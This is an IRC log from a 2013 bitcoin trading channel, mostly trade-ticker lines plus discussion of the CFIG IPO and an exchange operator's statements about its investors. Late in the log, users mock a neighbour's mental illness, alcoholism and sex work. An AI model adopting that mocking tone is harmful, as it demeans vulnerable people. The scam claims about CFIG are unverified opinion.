Aug 22 21:16:05 If the futures were liquid I would quote on em Aug 22 21:16:36 If there were maker taker I would quote all day Aug 22 21:16:37 the august diff bet is like 130 btc total pot. Aug 22 21:17:15 how many people need to hedge exposures over hundreds of btc ? Aug 22 21:17:17 is there any money left to be made betting yes? Aug 22 21:17:21 [BTCTC] [BASIC-MINING] 3 @ 0.26 = 0.78 BTC [-] Aug 22 21:17:40 ThickAsThieves well it's pretty much defunct now, but my point is it being liquid when it closes. Aug 22 21:17:57 you want to make money on the dead horse ? Aug 22 21:18:01 hehe Aug 22 21:18:15 but you are right bitbet could certainly be better utilized Aug 22 21:18:29 my futures are reasonably liquid.. just that certain person gobbles them all Aug 22 21:18:30 [HAVELOCK] [LABCO] 12 @ 0.00224 = 0.0269 BTC [-] Aug 22 21:18:47 roughly speaking it became improfitable at about 10k weight. Aug 22 21:19:00 which is after 90% of its lifetime. Aug 22 21:19:24 but look at the graph and it'll be pretty clear btc was made in that runup there, which was starting what, 1-2 weeks ago Aug 22 21:19:32 [HAVELOCK] [AM100] 31 @ 0.0309 = 0.9579 BTC [+] Aug 22 21:19:54 indeed, butbet falls off my radar a lot Aug 22 21:20:00 but it's getting on the list Aug 22 21:20:05 bitbet* Aug 22 21:20:19 [BTCTC] [BTC-BOND] 2 @ 0.009999 = 0.02 BTC [+] Aug 22 21:20:21 [HAVELOCK] [CFIG] 61 @ 0.15 = 9.15 BTC Aug 22 21:22:58 [BTCTC] [PAJKA.BOND] 1 @ 0.025 BTC [+] Aug 22 21:25:45 okay, https://bitfunder.com/asset/CoinBr.iDiff-E is open. Aug 22 21:25:53 https://btct.co/security/CB.IDIFF-E needs your 2 votes Aug 22 21:25:55 BTC-TC: BTC Trading Corp - View Security Aug 22 21:26:34 http://closetfascination.files.wordpress.com/2010/07/cigarettegirl4.jpg Aug 22 21:29:35 [BTCTC] [LABCOIN] 1000 @ 0.00232 = 2.32 BTC [-] Aug 22 21:33:54 [BTCTC] [ASICMINER-PT] 1 @ 3.087 BTC [-] Aug 22 21:33:55 [BTCTC] [ASICMINER-PT] 1 @ 3.088 BTC [+] Aug 22 21:35:27 [BTCTC] [BASIC-MINING] 1 @ 0.2749 BTC [+] Aug 22 21:36:17 [BTCTC] [BASIC-MINING] 1 @ 0.26 BTC [-] Aug 22 21:37:43 mircea_popescu, have you done deposits lately? Aug 22 21:39:12 [BTCTC] [KENILWORTH] 1 @ 0.001796 BTC [-] Aug 22 21:41:33 [HAVELOCK] [AM100] 3 @ 0.0309 = 0.0927 BTC [+] Aug 22 21:43:46 mircea_popescu: withdrawals plz Aug 22 21:43:47 jkjk Aug 22 21:44:03 why aren't the cfig trades showing a - or +? Aug 22 21:44:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.03043 BTC [+] Aug 22 21:45:05 Maybe beecause it is still a true IPO and not open for trading Aug 22 21:45:08 It's in IPO Aug 22 21:45:15 Not sure though, mostly speculation Aug 22 21:45:18 cuz they never changed price Aug 22 21:45:22 i can confirm that the private investors for CFIG did pay with USD directly to Crypto Financial, and crypto pushed shares on havelock into their havelock accounts. Aug 22 21:45:25 oh Aug 22 21:45:35 Thanks topace Aug 22 21:45:44 [BTCTC] [DMS.MINING] 5 @ 0.003466 = 0.0173 BTC [+] Aug 22 21:46:24 Topace, are they being limited to 20,000 shares a piece? Aug 22 21:46:29 ThickAsThieves thestringpuller flushed Aug 22 21:46:40 kleeck: no, the private investors are not limited Aug 22 21:46:48 thx! Aug 22 21:47:00 tat buying in? :P Aug 22 21:47:19 topace, much appreciated. Thank you. Aug 22 21:47:27 going shopping! Aug 22 21:47:29 hehe Aug 22 21:48:28 also, CFIG has confirmed that the private investors will NOT sell _any_ of their shares on havelock, until CFIG is officially in operation (aka, its verifyable that people have opened accounts with them and deposited/withdrawn fiat) Aug 22 21:49:32 thats just a word Aug 22 21:49:44 kakobrekla: no, i've locked their accounts too :p Aug 22 21:49:54 and that just a line of code Aug 22 21:50:08 sure, but at some point, there needs to be some trust :p Aug 22 21:50:08 gottsta troll Aug 22 21:50:08 [HAVELOCK] [XBOND] 10 @ 0.00114499 = 0.0114 BTC [+] Aug 22 21:50:11 lol Aug 22 21:50:22 first line was srs, second was troll Aug 22 21:50:27 if that clears it up Aug 22 21:50:27 :) Aug 22 21:50:32 That's really cool to know, Thanks topace Aug 22 21:53:32 [BTCTC] [BTC-GROWTH] 3 @ 0.1002 = 0.3006 BTC [+] Aug 22 21:54:02 kjhgghghhuujjyrer Aug 22 21:54:04 topace if i pay you a visit and show you how i give this guy you've never met fifty million dollars in fresh bills would you be in a much better position to see how private investorsa have paid fiat for whatever putative business than you are in this case, on account of at least actually having seen money change hands ? Aug 22 21:54:05 ls Aug 22 21:54:18 gcc -c something.c somethingelse.c Aug 22 21:55:04 [BTCTC] [ACTIVEMINING] 16 @ 0.005357 = 0.0857 BTC [-] Aug 22 21:55:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005358 = 0.2679 BTC [+] Aug 22 21:55:06 [BTCTC] [ACTIVEMINING] 100 @ 0.005362 = 0.5362 BTC [+] Aug 22 21:55:08 [BTCTC] [ACTIVEMINING] 17 @ 0.005362 = 0.0912 BTC [+] Aug 22 21:55:08 [BTCTC] [ACTIVEMINING] 68 @ 0.005363 = 0.3647 BTC [+] Aug 22 21:55:20 why did i sell all my XBOND at 1.05 par? Aug 22 21:55:44 because that's what it's worth? Aug 22 21:56:02 well, yes Aug 22 21:56:31 but nobody told that to the people buying at 1.14 Aug 22 21:56:46 hm. well, YOU told them, they just didn't listen Aug 22 21:56:50 hehe Aug 22 21:57:21 CFIG's ipo is getting more curious by the day Aug 22 21:57:39 When does it open? Aug 22 21:58:12 2 weeks ago? Aug 22 21:58:19 yeah, a while back Aug 22 21:58:39 they announced earlier today that they're gonna cut the IPO short and start selling shares on the market tomorrow Aug 22 21:58:57 Ahh, right. Thats what I ment Aug 22 21:59:05 Tomorrow what time? Aug 22 21:59:06 somebody bought 100k shares today, too Aug 22 21:59:11 tomorrow noon, i think? Aug 22 21:59:13 i.. why would they do that?.. wtf Aug 22 21:59:13 so they will just move the IPO shares to the market? Aug 22 21:59:17 yes Aug 22 21:59:22 oh clever Aug 22 21:59:33 i think the original plan was 200k shares, in four tranches of 50k Aug 22 21:59:50 but there's less than 50k left now, after those couple of huge buys Aug 22 21:59:57 gonna need a less-than-private bitcoin-denominated investor to move that one Aug 22 22:00:06 I think they have another super buy on deck. I'm guessing that there won't be many, if any, shares on the open market by 12p tomorrow. Aug 22 22:00:07 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC Aug 22 22:00:46 hm. i trashed the email that mentioned the start time tomorrow Aug 22 22:00:55 oh, here: Aug 22 22:00:57 CRYPTO FINANCIAL (CFIG) is pleased to announce that our public offering of our Virtual Shares will close on Friday August 23rd, 2013 AT 12:00 P.M EST. Live trading of our shares will commence immediately once the IPO has closed. Any remaining shares will be placed for sale in the open market at the original IPO price. We appreciate the countless people and organizations that have reached out to us Aug 22 22:00:58 12pm est. Aug 22 22:00:58 have showed their support for our venture. Aug 22 22:01:16 (pleased to announce!) Aug 22 22:01:29 we're pleased to announce that our ipo didn't sell out Aug 22 22:01:33 basically cfig shares half off tomorrow? :P Aug 22 22:02:05 i kinda doubt it, at this point Aug 22 22:02:22 depends really Aug 22 22:02:31 if private invetsors buy more, then, no Aug 22 22:02:40 i mean, i don't think the whales who bought the 150k ipo shares are going to sell Aug 22 22:02:42 if they post 47k ask wall, well... Aug 22 22:02:45 doubt people will sell less than they just bought at Aug 22 22:03:02 [BTCTC] [DMS.MINING] 1 @ 0.003466 BTC [+] Aug 22 22:03:06 and yes, the remaining shares from tranche1 move to the open market at noon tomrorow Aug 22 22:03:07 noon EST Aug 22 22:03:13 Not only will the smalls not sell for a loss, but we were JUST told that the pricate bigs are locked until the official launch... Aug 22 22:03:20 countless ? Aug 22 22:03:36 only 20 fingers toes, yknow Aug 22 22:03:39 & Aug 22 22:04:01 heh Aug 22 22:04:21 you technically can't count zero things, either Aug 22 22:04:47 maky, since i'm not getting an answer on the first one, let's see a follow-up question. Aug 22 22:05:10 topace are you familiar with how civil judgements work in joint and several responsibility cases ? Aug 22 22:05:11 42 Aug 22 22:05:23 ^ Aug 22 22:08:01 umm say what ? Aug 22 22:08:15 sigh. Aug 22 22:08:37 looky here : if this cfig scam ever sees the light of day in a courthouse of some jurisdiction where every other party involved is immune but you are not, Aug 22 22:08:40 what does 50 million provably trading hands have to do ? Aug 22 22:08:44 [HAVELOCK] [XBOND] 5 @ 0.00114499 = 0.0057 BTC [+] Aug 22 22:09:00 should the jury decide your'e as much as 0.1% liable for the damages on the grounds of for instance having made statemets as to investors that don't exist Aug 22 22:09:09 you will see a judgement for the WHOLE sum slapped on your ass. Aug 22 22:09:14 opp another a scam Aug 22 22:09:19 Yay! Third time around and mircea_popescu is able to clearly articulate his inquiry. lol. Aug 22 22:09:28 [HAVELOCK] [XBOND] 1 @ 0.00114499 BTC [+] Aug 22 22:09:31 gotcha Aug 22 22:09:41 kleeck it was clear the first tiem around for people with a clue in the matters discussed. Aug 22 22:09:47 right... Aug 22 22:09:49 right. Aug 22 22:09:49 real clear... Aug 22 22:09:51 obviously. Aug 22 22:09:56 :P Aug 22 22:10:00 clear as mud Aug 22 22:10:04 people need much better lawyers. Aug 22 22:10:08 yes, my lawyer is telling me i need to stop answering questions about my securities in public too Aug 22 22:10:19 Interesting. Aug 22 22:10:19 because they still haven't introduced this defense by "i thought it was obscure youir honor, honest i did" Aug 22 22:10:20 mircea_popescu: would you feel better if my reply was "let me let me lawyer get back to you?" Aug 22 22:10:23 cuz i can do that if you want Aug 22 22:10:23 solicitation Aug 22 22:10:39 topace you should probably hire one at any point. because you're currently hanging yourself. Aug 22 22:10:47 we already have lawyers Aug 22 22:10:59 that we pay a good chunk of $$$$$ to Aug 22 22:11:16 i feel like i'm missing a small but crucial piece of this conversation Aug 22 22:11:17 so yes, i'll stop replying to the public, and refer all questions to the lawyers frmo this point forward Aug 22 22:11:19 no, you don't have lawyers. Aug 22 22:11:28 you may be paying someone whatever, but lawyers they are not. Aug 22 22:11:34 topace: we = ?? Aug 22 22:11:45 they are candian lawyers Aug 22 22:11:47 havelock i assume nubbins Aug 22 22:11:51 canadian* Aug 22 22:12:00 they arent as crunchy as the american ones Aug 22 22:12:02 we = havelock Aug 22 22:12:05 ah Aug 22 22:12:38 and yes, canadian lawyers, specializing in securities law, both canadian and international Aug 22 22:12:44 MP are you saying you believe the 'private investors' of cfig are really just CFIG themselves? Aug 22 22:12:54 Duffer1: that's what i assumed Aug 22 22:13:10 shockingly, topace DOES know more about his own legal situation than mircea_popescu! Aug 22 22:13:26 :p Aug 22 22:13:27 MP says that about anything that smells funny Aug 22 22:13:30 Duffer1 i am saying it is motherfucking insane on a stick for topace to make that sort of statement about things he has absolutely no way of veryifying Aug 22 22:14:18 all i've confirmed so far is that CFIG has confirmed that the private investors have invested in USD directly to CFIG in exchange for shares pushed to their havelock account Aug 22 22:14:37 [BTCTC] [LABCOIN] 215 @ 0.002325 = 0.4999 BTC [+] Aug 22 22:14:40 no. you have actually stated that you have verified private investors have paid fiat to them for the shares. Aug 22 22:14:57 ohh i see Aug 22 22:15:10 the elements being a. private investors ; b. fiat payment and c. right value for the shares. Aug 22 22:15:39 also, it's still solicitation Aug 22 22:15:52 ThickAsThieves im not even getting into all of that Aug 22 22:15:58 i have received verification from cfig, i have not verified the facts of these private investors myself. Aug 22 22:16:06 mircea_popescu, on another note how is Eulora coming along? It is still just packed for Linux correct? Aug 22 22:16:08 [BTCTC] [DMS.PURCHASE] 1 @ 0.02057 BTC [-] Aug 22 22:16:11 topace so then say so eh ? or else have the laywers you pay fix your text Aug 22 22:16:17 rather than rely on me doing it for free. Aug 22 22:16:19 [HAVELOCK] [SDSTM] 2 @ 0.0056 = 0.0112 BTC [+] Aug 22 22:16:26 jborkl just linux for now yes. Aug 22 22:16:45 recently alpha v2 was released, chugging right along. Aug 22 22:16:59 i'll try to be more clear and more careful in my text Aug 22 22:17:01 ok, is finding the teleport thing still going on? Aug 22 22:17:10 I can't remember exactly Aug 22 22:17:28 and should probably just stop replying all together in chat environments where heat of the moment quick discussions can snowball out of control Aug 22 22:17:44 [BTCTC] [DMS.SELLING] 1 @ 0.0173 BTC [-] Aug 22 22:17:45 topace mazel tov. Aug 22 22:17:57 jborkl yup, still easter egg active. Aug 22 22:18:49 okay I have some time so I am going to dl it and do a article about it- that ok with you? Aug 22 22:18:55 by all means. Aug 22 22:21:29 [BTCTC] [PAJKA.BOND] 1 @ 0.025 BTC [+] Aug 22 22:22:44 [BTCTC] [DMS.MINING] 1 @ 0.003465 BTC [-] Aug 22 22:22:45 [BTCTC] [DMS.MINING] 17 @ 0.003465 = 0.0589 BTC [-] Aug 22 22:22:47 [HAVELOCK] [AM100] 1 @ 0.02992 BTC [-] Aug 22 22:22:49 [HAVELOCK] [AM100] 10 @ 0.02991 = 0.2991 BTC [-] Aug 22 22:22:51 [HAVELOCK] [AM100] 35 @ 0.0299 = 1.0465 BTC [-] Aug 22 22:22:53 [HAVELOCK] [AM100] 10 @ 0.02982 = 0.2982 BTC [-] Aug 22 22:22:55 [HAVELOCK] [AM100] 40 @ 0.02981001 = 1.1924 BTC [-] Aug 22 22:22:57 [HAVELOCK] [AM100] 3 @ 0.02981 = 0.0894 BTC [-] Aug 22 22:22:59 [HAVELOCK] [AM100] 1 @ 0.02981 BTC [-] Aug 22 22:22:59 topace besides the correct formulation, i find it rather indiscreet to speak about transfers between clients Aug 22 22:23:30 we havent disclosed any confidential information Aug 22 22:23:38 jurov well to the degree there's a lockout he can state that much, or anyway confirm a statement by the owner. Aug 22 22:23:52 yes, then just provide url where cfig says that Aug 22 22:24:35 well he can confirm it as a fact, "i have indeed locked this many shares" if it is a fact. Aug 22 22:24:42 otherwise the url is weak. Aug 22 22:25:12 [BTCTC] [ACTIVEMINING] 68 @ 0.005273 = 0.3586 BTC [-] Aug 22 22:25:14 [BTCTC] [ACTIVEMINING] 50 @ 0.005272 = 0.2636 BTC [-] Aug 22 22:26:17 [BTCTC] [DMS.PURCHASE] 125 @ 0.02057 = 2.5713 BTC [-] Aug 22 22:29:25 [MPEX] [S.MPOE] 5069 @ 0.00083323 = 4.2236 BTC [+] Aug 22 22:29:36 [BTCTC] [TAT.ASICMINER] 2 @ 0.03016 = 0.0603 BTC [-] Aug 22 22:30:11 [HAVELOCK] [AM100] 3 @ 0.0308 = 0.0924 BTC [+] Aug 22 22:30:14 [BTCTC] [LABCOIN] 500 @ 0.002325 = 1.1625 BTC [+] Aug 22 22:31:21 [HAVELOCK] [CFIG] 80 @ 0.15 = 12 BTC Aug 22 22:31:35 [BTCTC] [ASICMINER-PT] 1 @ 3.089 BTC [+] Aug 22 22:31:57 [BTCTC] [DMS.SELLING] 2 @ 0.0173 = 0.0346 BTC [-] Aug 22 22:31:58 [BTCTC] [DMS.MINING] 34 @ 0.003465 = 0.1178 BTC [-] Aug 22 22:32:39 [BTCTC] [ACTIVEMINING] 265 @ 0.005271 = 1.3968 BTC [-] Aug 22 22:33:14 [HAVELOCK] [VTX] 7 @ 0.561 = 3.927 BTC [-] Aug 22 22:33:29 [HAVELOCK] [AM1] 2 @ 3.1 = 6.2 BTC [-] Aug 22 22:34:15 [HAVELOCK] [XBOND] 45 @ 0.00114499 = 0.0515 BTC [+] Aug 22 22:34:42 [BTCTC] [ASICMINER-PT] 1 @ 3.089 BTC [+] Aug 22 22:36:53 [BTCTC] [ASICMINER-PT] 1 @ 3.089 BTC [+] Aug 22 22:42:23 [HAVELOCK] [CFIG] 1 @ 0.15 BTC Aug 22 22:43:05 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 22 22:47:31 [BTCTC] [DMS.MINING] 3 @ 0.003465 = 0.0104 BTC [-] Aug 22 22:49:00 [HAVELOCK] [AM100] 99 @ 0.02981 = 2.9512 BTC [-] Aug 22 22:49:44 [HAVELOCK] [AM100] 1 @ 0.02981 BTC [-] Aug 22 22:52:14 [HAVELOCK] [AM100] 1 @ 0.0298 BTC [-] Aug 22 22:52:17 [HAVELOCK] [AM100] 1 @ 0.0297901 BTC [-] Aug 22 22:52:18 [HAVELOCK] [AM100] 30 @ 0.02979 = 0.8937 BTC [-] Aug 22 22:52:20 [HAVELOCK] [AM100] 10 @ 0.0281 = 0.281 BTC [-] Aug 22 22:52:22 [HAVELOCK] [AM100] 61 @ 0.028 = 1.708 BTC [-] Aug 22 22:52:24 [HAVELOCK] [AM100] 3 @ 0.0277 = 0.0831 BTC [-] Aug 22 22:52:27 [HAVELOCK] [AM100] 14 @ 0.0276 = 0.3864 BTC [-] Aug 22 22:52:52 [HAVELOCK] [AM1] 2 @ 3.15 = 6.3 BTC [+] Aug 22 22:53:12 [HAVELOCK] [HIM] 1 @ 0.19 BTC [+] Aug 22 22:53:14 [HAVELOCK] [HIM] 10 @ 0.191 = 1.91 BTC [+] Aug 22 22:53:17 [HAVELOCK] [HIM] 100 @ 0.19899999 = 19.9 BTC [+] Aug 22 22:53:19 [HAVELOCK] [HIM] 73 @ 0.199 = 14.527 BTC [+] Aug 22 22:55:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.03017 BTC [+] Aug 22 22:55:41 I'm gonna try to get eulora running on osx Aug 22 22:55:58 go with our blessings. Aug 22 22:56:22 [BTCTC] [BASIC-MINING] 1 @ 0.2655 BTC [+] Aug 22 22:57:06 [BTCTC] [BASIC-MINING] 2 @ 0.26 = 0.52 BTC [-] Aug 22 22:57:58 [HAVELOCK] [HIM] 16 @ 0.2 = 3.2 BTC [+] Aug 22 22:59:19 [BTCTC] [ASICMINER-PT] 4 @ 3.09 = 12.36 BTC [+] Aug 22 23:00:51 [BTCTC] [ACTIVEMINING] 68 @ 0.005276 = 0.3588 BTC [+] Aug 22 23:01:24 [HAVELOCK] [AM1] 3 @ 3.15 = 9.45 BTC [+] Aug 22 23:01:26 [HAVELOCK] [AM1] 5 @ 3.17 = 15.85 BTC [+] Aug 22 23:01:29 [HAVELOCK] [CFIG] 40 @ 0.15 = 6 BTC Aug 22 23:01:33 [BTCTC] [ACTIVEMINING] 34 @ 0.005275 = 0.1794 BTC [-] Aug 22 23:02:14 [BTCTC] [ACTIVEMINING] 1 @ 0.005267 BTC [-] Aug 22 23:02:55 [BTCTC] [ACTIVEMINING] 67 @ 0.005267 = 0.3529 BTC [-] Aug 22 23:03:24 [BTCTC] [ACTIVEMINING] 1 @ 0.005266 BTC [-] Aug 22 23:03:56 [BTCTC] [ACTIVEMINING] 263 @ 0.005265 = 1.3847 BTC [-] Aug 22 23:05:42 [HAVELOCK] [SMG] 33 @ 0.00022899 = 0.0076 BTC [+] Aug 22 23:05:45 [HAVELOCK] [SMG] 20 @ 0.000229 = 0.0046 BTC [+] Aug 22 23:05:47 [BTCTC] [LABCOIN] 1196 @ 0.002325 = 2.7807 BTC [+] Aug 22 23:05:48 [BTCTC] [LABCOIN] 65 @ 0.002325 = 0.1511 BTC [+] Aug 22 23:05:49 [BTCTC] [LABCOIN] 5000 @ 0.00237 = 11.85 BTC [+] Aug 22 23:05:50 [BTCTC] [LABCOIN] 1000 @ 0.002374 = 2.374 BTC [+] Aug 22 23:05:51 [BTCTC] [LABCOIN] 2739 @ 0.002375 = 6.5051 BTC [+] Aug 22 23:06:18 [BTCTC] [DMS.PURCHASE] 1 @ 0.02057 BTC [-] Aug 22 23:07:47 [HAVELOCK] [HIM] 4 @ 0.2 = 0.8 BTC [+] Aug 22 23:07:55 [BTCTC] [LABCOIN] 1 @ 0.002374 BTC [-] Aug 22 23:13:01 [HAVELOCK] [HIM] 30 @ 0.2 = 6 BTC [+] Aug 22 23:13:04 [HAVELOCK] [HIM] 100 @ 0.201 = 20.1 BTC [+] Aug 22 23:13:06 [HAVELOCK] [HIM] 10 @ 0.202 = 2.02 BTC [+] Aug 22 23:13:08 [HAVELOCK] [HIM] 4 @ 0.2068989 = 0.8276 BTC [+] Aug 22 23:13:10 [HAVELOCK] [HIM] 15 @ 0.2088999 = 3.1335 BTC [+] Aug 22 23:13:13 [HAVELOCK] [HIM] 20 @ 0.20898 = 4.1796 BTC [+] Aug 22 23:13:15 [HAVELOCK] [HIM] 10 @ 0.21 = 2.1 BTC [+] Aug 22 23:13:17 [HAVELOCK] [HIM] 3 @ 0.219 = 0.657 BTC [+] Aug 22 23:14:48 [HAVELOCK] [HIM] 25 @ 0.22 = 5.5 BTC [+] Aug 22 23:14:49 http://www.presseurop.eu/en/content/article/4077541-berlin-bitcoins-readily-replace-euro Aug 22 23:14:54 Germany: In Berlin, bitcoins readily replace the euro | Presseurop.eu: European news, cartoons and p Aug 22 23:15:30 [HAVELOCK] [HIM] 83 @ 0.22 = 18.26 BTC [+] Aug 22 23:16:45 [HAVELOCK] [VTX] 5 @ 0.6 = 3 BTC [+] Aug 22 23:16:48 [HAVELOCK] [VTX] 10 @ 0.6099899 = 6.0999 BTC [+] Aug 22 23:16:49 [HAVELOCK] [VTX] 1 @ 0.60999 BTC [+] Aug 22 23:16:51 [HAVELOCK] [VTX] 10 @ 0.612999 = 6.13 BTC [+] Aug 22 23:16:53 [HAVELOCK] [VTX] 5 @ 0.62 = 3.1 BTC [+] Aug 22 23:17:54 [BTCTC] [DMS.SELLING] 2 @ 0.0173 = 0.0346 BTC [-] Aug 22 23:19:27 [BTCTC] [DMS.MINING] 10 @ 0.00339 = 0.0339 BTC [-] Aug 22 23:19:28 [BTCTC] [DMS.MINING] 1 @ 0.00339 BTC [-] Aug 22 23:19:30 [BTCTC] [DMS.MINING] 5 @ 0.00339 = 0.017 BTC [-] Aug 22 23:19:31 [BTCTC] [DMS.MINING] 96 @ 0.003389 = 0.3253 BTC [-] Aug 22 23:19:37 [HAVELOCK] [VTX] 2 @ 0.62199 = 1.244 BTC [+] Aug 22 23:19:40 [HAVELOCK] [VTX] 1 @ 0.65 BTC [+] Aug 22 23:20:32 [HAVELOCK] [HIM] 17 @ 0.22 = 3.74 BTC [+] Aug 22 23:20:42 [HAVELOCK] [HIM] 50 @ 0.223 = 11.15 BTC [+] Aug 22 23:21:15 [HAVELOCK] [HIM] 11 @ 0.2239 = 2.4629 BTC [+] Aug 22 23:24:37 [HAVELOCK] [HIM] 20 @ 0.223 = 4.46 BTC [-] Aug 22 23:25:08 [HAVELOCK] [HIM] 10 @ 0.223 = 2.23 BTC [-] Aug 22 23:26:42 my neighbour has tourette's syndrome and MPD Aug 22 23:26:46 and she's FREAKING out right now Aug 22 23:26:51 LOL Aug 22 23:26:55 Tell me more. Aug 22 23:27:51 Do all of her personalities have tourettes? Aug 22 23:28:29 from what i can tell, yes Aug 22 23:28:38 only some of them use words Aug 22 23:29:00 Some of her personalities are also animals. Aug 22 23:29:06 she's switching right now between her demon voice and sobbing whimpers Aug 22 23:29:13 Yikes... Aug 22 23:29:18 sounds sad Aug 22 23:29:25 Indeed. Aug 22 23:29:31 yeah, sucks Aug 22 23:29:41 she's also a hooker and an alcoholic Aug 22 23:29:48 What?! Aug 22 23:29:53 yeah Aug 22 23:30:01 [HAVELOCK] [VTX] 4 @ 0.65 = 2.6 BTC [+] Aug 22 23:30:04 obvious question is "who the fuck would sleep with her" Aug 22 23:30:09 ^ Aug 22 23:30:28 obvious answers is "the kind of man who gets turned down by normal hookers" Aug 22 23:30:48 maybe she sleeps with herself Aug 22 23:30:50 so i see some pretty sketchy-looking fellas come and go Aug 22 23:31:01 [BTCTC] [HOSTED-MINING] 207 @ 0.28 = 57.96 BTC [+] Aug 22 23:31:31 hahaha 0 times, she hates me Aug 22 23:31:38 nubbins`: ustream statte Aug 22 23:32:29 [BTCTC] [DMS.SELLING] 31 @ 0.0173 = 0.5363 BTC [-] Aug 22 23:32:33 last year, she was putting hand-written business cards under people's windshield wipers in the liquor store parking lot Aug 22 23:32:34 [BTCTC] [ACTIVEMINING] 68 @ 0.005356 = 0.3642 BTC [+] Aug 22 23:32:36 [BTCTC] [ACTIVEMINING] 14 @ 0.005357 = 0.075 BTC [+] Aug 22 23:32:38 "anale: $200" Aug 22 23:32:44 "everything: $230" Aug 22 23:33:13 yeah Aug 22 23:33:27 [BTCTC] [ACTIVEMINING] 1725 @ 0.005358 = 9.2426 BTC [+] Aug 22 23:33:36 mildly surprised that there's only a $30 difference between anal and "everything" Aug 22 23:33:50 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 22 23:34:17 [BTCTC] [ASICMINER-PT] 1 @ 3.11 BTC [+] Aug 22 23:34:18 [BTCTC] [ASICMINER-PT] 1 @ 3.112 BTC [+] Aug 22 23:34:19 [BTCTC] [ASICMINER-PT] 1 @ 3.113 BTC [+] Aug 22 23:34:26 [BTCTC] [DMS.PURCHASE] 1 @ 0.02057 BTC [-] Aug 22 23:34:42 no, she literally hates me Aug 22 23:35:17 sounds about right actually. what else is in everything ? Aug 22 23:35:29 i think she has me confused with a guy who used to live here Aug 22 23:35:40 [BTCTC] [TAT.ASICMINER] 32 @ 0.03019 = 0.9661 BTC [+] Aug 22 23:36:11 her first words to me were about 3 months ago Aug 22 23:36:20 when she said FUCK YOU as she walked to the store Aug 22 23:36:44 naturally, i replied with the same Aug 22 23:36:55 next day she kicked my house and i went outside and freaked out at her Aug 22 23:37:13 now she mutters angrily whenever she passes by :( Aug 22 23:37:16 [BTCTC] [BTC-GROWTH] 1 @ 0.1002 BTC [+] Aug 22 23:38:00 [BTCTC] [DMS.PURCHASE] 145 @ 0.02057 = 2.9827 BTC [-] Aug 22 23:38:35 unfortunately, we share a wall Aug 22 23:38:39 so i get to hear her all day Aug 22 23:39:20 [HAVELOCK] [SMG] 1 @ 0.0002298 BTC [+] Aug 22 23:39:22 for a while, when it got too bothersome, i would push a 150w bass amp against the wall and turn on a drum machine Aug 22 23:39:35 but then i realized that i was probably just making things worse :P Aug 22 23:41:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.0302 = 0.1208 BTC [+] Aug 22 23:42:57 [BTCTC] [DMS.PURCHASE] 6 @ 0.02057 = 0.1234 BTC [-] Aug 22 23:43:27 [BTCTC] [DMS.MINING] 4 @ 0.003459 = 0.0138 BTC [+] Aug 22 23:47:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.0302 = 0.0906 BTC [+] Aug 22 23:48:42 [BTCTC] [DMS.PURCHASE] 4 @ 0.02057 = 0.0823 BTC [-] Aug 22 23:48:49 [HAVELOCK] [XBOND] 12 @ 0.00114499 = 0.0137 BTC [+] Aug 22 23:48:58 [BTCTC] [ASICMINER-PT] 3 @ 3.115 = 9.345 BTC [+] Aug 22 23:49:08 [HAVELOCK] [AM100] 2 @ 0.0299 = 0.0598 BTC [+] Aug 22 23:49:52 [HAVELOCK] [HIM] 4 @ 0.223 = 0.892 BTC [-] Aug 22 23:50:26 [BTCTC] [DMS.MINING] 2 @ 0.003459 = 0.0069 BTC [+] Aug 22 23:51:52 [BTCTC] [BASIC-MINING] 3 @ 0.275 = 0.825 BTC [+] Aug 22 23:52:45 [BTCTC] [BASIC-MINING] 1 @ 0.2753 BTC [+] Aug 22 23:53:17 [BTCTC] [BASIC-MINING] 4 @ 0.2789 = 1.1156 BTC [+] Aug 22 23:53:18 [BTCTC] [BASIC-MINING] 3 @ 0.2789 = 0.8367 BTC [+] Aug 22 23:53:54 [BTCTC] [BASIC-MINING] 16 @ 0.279 = 4.464 BTC [+] Aug 22 23:54:16 [HAVELOCK] [AM100] 1 @ 0.0299 BTC [+] Aug 22 23:56:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.03043 BTC [+] Aug 22 23:57:31 [BTCTC] [ASICMINER-PT] 2 @ 3.115 = 6.23 BTC [+] Aug 22 23:57:32 [BTCTC] [ASICMINER-PT] 1 @ 3.12 BTC [+] Aug 22 23:58:20 [BTCTC] [ACTIVEMINING] 193 @ 0.005358 = 1.0341 BTC [+] Aug 22 23:58:20 [BTCTC] [ACTIVEMINING] 137 @ 0.005265 = 0.7213 BTC [-] Aug 22 23:58:22 [BTCTC] [ACTIVEMINING] 250 @ 0.005251 = 1.3128 BTC [-] Aug 22 23:58:23 [BTCTC] [ACTIVEMINING] 1000 @ 0.00525 = 5.25 BTC [-] Aug 23 00:07:21 [BTCTC] [COGNITIVE] 1 @ 0.3096 BTC [+] Aug 23 00:12:57 [BTCTC] [BASIC-MINING] 1 @ 0.2601 BTC [-] Aug 23 00:14:34 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC [+] Aug 23 00:14:55 why are you hollywood now Aug 23 00:15:18 does anyone know how to add a yubikey to btct.co Aug 23 00:15:22 i dont want to break something.. Aug 23 00:15:26 by mistake Aug 23 00:18:02 nvm i got it! Aug 23 00:18:41 [BTCTC] [DMS.MINING] 4 @ 0.003459 = 0.0138 BTC [+] Aug 23 00:19:24 [BTCTC] [BASIC-MINING] 1 @ 0.26 BTC [-] Aug 23 00:20:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [-] Aug 23 00:20:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [-] Aug 23 00:20:32 [HAVELOCK] [LABCO] 1 @ 0.00224 BTC [-] Aug 23 00:20:33 O.o so google uses clever autoresponders for product support? Aug 23 00:20:40 http://productforums.google.com/forum/#!topic/gmail/2zMbx5Y8WFg scroll to bottom Aug 23 00:20:42 Google Groups Aug 23 00:20:46 [BTCTC] [LABCOIN] 11 @ 0.002374 = 0.0261 BTC [-] Aug 23 00:23:34 welcome to future, asking something only to find you were in fact talking only to Clippy-like abomination Aug 23 00:27:03 why are you hollywood now < Honestly - I have never been clever with nicks, but I am trying to build the news site and forum noobs would rather get news from Hollywood than jborkl Aug 23 00:28:46 [HAVELOCK] 